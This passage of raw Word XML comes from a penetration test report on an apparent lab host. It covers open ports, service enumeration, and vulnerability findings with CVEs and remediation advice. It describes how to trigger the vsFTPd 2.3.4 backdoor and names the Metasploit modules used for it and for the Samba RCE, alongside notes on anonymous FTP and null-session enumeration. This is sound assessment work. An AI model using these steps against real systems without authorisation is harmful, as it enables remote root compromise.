          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ISC BIND 9.4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Apache/2.2.8 (Ubuntu) DAV/2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>139</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>NetBIOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>(Samba smbd 3.X - 4.X)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>445</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>(Samba smbd 3.0.20-Debian)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1F497D"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>4. Service Enumeration Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.1 FTP — Port 21 (vsFTPd 2.3.4)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>FTP service is running vsFTPd version 2.3.4. The following enumeration was performed:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Banner: 220 (vsFTPd 2.3.4) — version disclosed in cleartext.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Anonymous login test: USER anonymous / PASS anonymous@example.com — LOGIN SUCCESSFUL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SYST response: 215 UNIX Type: L8 — confirms Linux/Unix host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Directory listing accessible post anonymous login: /pub directory readable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CRITICAL NOTE: vsFTPd 2.3.4 is known to contain a backdoor (CVE-2011-2523) triggered by sending a smiley face :) in the username field, opening a root shell on port 6200.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.2 SSH — Port 22 (OpenSSH 4.7p1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SSH service exposes version information in the protocol banner:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Banner: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>OpenSSH 4.7p1 was released in 2007 — multiple CVEs exist against this version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Weak legacy cipher suites may be negotiable depending on server configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Username enumeration may be possible via timing-based side channel (CVE-2018-15473).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.3 HTTP — Port 80 (Apache 2.2.8)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The HTTP server at port 80 runs Apache 2.2.8 on Ubuntu. Security header analysis revealed:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Server: Apache/2.2.8 (Ubuntu) DAV/2 — full version disclosure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Missing: X-Frame-Options (clickjacking risk).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Missing: Content-Security-Policy (XSS risk).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Missing: Strict-Transport-Security / HSTS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Interesting paths discovered: /phpMyAdmin (200 OK), /twiki (200 OK), /mutillidae (200 OK), /dvwa (200 OK) — multiple web applications exposed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>WebDAV enabled — potentially allows file upload without authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.4 SMB/NetBIOS — Ports 139 &amp; 445 (Samba 3.0.20)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SMB service detected on both ports 139 and 445 running Samba 3.0.20-Debian:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Samba 3.0.20 is vulnerable to CVE-2007-2447 — command injection via username field (username map script exploit), allowing unauthenticated remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SMBv1 negotiate response received — EternalBlue style probing possible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Enum4linux results: share listing enabled without authentication, WORKGROUP = WORKGROUP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Null sessions permitted — IPC$ share accessible without credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>User enumeration via RID cycling: accounts identified include root, sys, klog, msfadmin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.5 Telnet — Port 23</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Telnet service is active. Telnet transmits all data including credentials in plaintext, making it trivially interceptable via any network tap or man-in-the-middle position. This service should be disabled immediately and replaced with SSH.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1F497D"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>5. Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The following vulnerabilities were identified and classified by severity. Each entry includes a description, CVE reference where applicable, evidence, and recommended remediation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[CRITICAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>V-001 — vsFTPd 2.3.4 Backdoor — Remote Root Shell</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>21/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE-2011-2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Banner '220 (vsFTPd 2.3.4)' confirmed. Metasploit module vsftpd_234_backdoor successful in lab.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Upgrade vsFTPd immediately to version 3.0.5+. Remove or replace affected binaries. Audit FTP server integrity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vsFTPd version 2.3.4 contains a deliberately inserted backdoor. Sending a smiley face ':)' as part of the username triggers a bind shell on TCP port 6200 running as root. This allows any unauthenticated attacker with network access to obtain a root shell on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[CRITICAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>V-002 — Samba 3.0.20 Username Map Script — Unauthenticated RCE</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>139/tcp, 445/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE-2007-2447</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>9.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Samba 3.0.20-Debian confirmed. Metasploit module usermap_script demonstrated successful RCE in lab.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Upgrade Samba immediately. Disable 'username map script' if not required. Apply vendor patches.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Samba versions 3.0.0 through 3.0.25rc3 allow remote code execution via shell metacharacter injection in the MS-RPC SamrChangePassword function when the 'username map script' option is enabled. An attacker can gain a reverse shell as the daemon user without any credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>V-003 — Anonymous FTP Login Allowed</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>21/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>USER anonymous / PASS anonymous@example.com — 230 Login successful confirmed by NetScout FTP enumerator.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
